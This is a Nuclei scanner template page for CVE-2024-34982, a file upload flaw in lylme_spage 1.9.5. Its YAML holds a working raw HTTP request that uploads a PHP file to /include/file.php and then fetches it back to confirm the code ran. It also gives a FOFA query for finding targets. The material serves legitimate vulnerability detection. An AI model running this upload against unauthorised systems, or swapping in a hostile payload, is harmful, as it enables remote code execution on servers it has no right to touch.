Skip to content
Nuclei Templates

LyLme-Spage - Arbitary File Upload

ID: CVE-2024-34982

Severity: high

Author: DhiyaneshDk

Tags: cve,cve2024,lylme-spage,rce,intrusive

Description

Section titled “Description”

An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.

YAML Source

Section titled “YAML Source”
id: CVE-2024-34982


info:
  name: LyLme-Spage - Arbitary File Upload
  author: DhiyaneshDk
  severity: high
  description: |
    An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.
  reference:
    - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
    - https://github.com/tanjiti/sec_profile
    - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
  classification:
    cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lylme
    product: lylme_spage
    fofa-query: icon_hash="-282504889"
  tags: cve,cve2024,lylme-spage,rce,intrusive


variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"


flow: http(1) && http(2)


http:
  - raw:
      - |
        POST /include/file.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------575673989461736


        -----------------------------575673989461736
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: image/png


        <?php echo "{{string}}";unlink(__FILE__);?>
        -----------------------------575673989461736--


    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"code":'
          - '"msg":'
          - '"url":'
          - 'php"}'
        condition: and
        internal: true


    extractors:
      - type: regex
        name: path
        part: body
        group: 1
        regex:
          - '"url":"([/a-z_0-9.]+)"'
        internal: true


  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{string}}" )'
          - 'contains(header, "text/html")'
        condition: and
# digest: 4a0a0047304502207de2fbccb743120553752eba9ad9cfb57d4267992cb574a82d53ce7f4b937582022100ecef0610ea3f8d041f1f7fe0e0b08b7dc0b9c015130b69a7464ca11e370287a2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-34982.yaml"

View on Github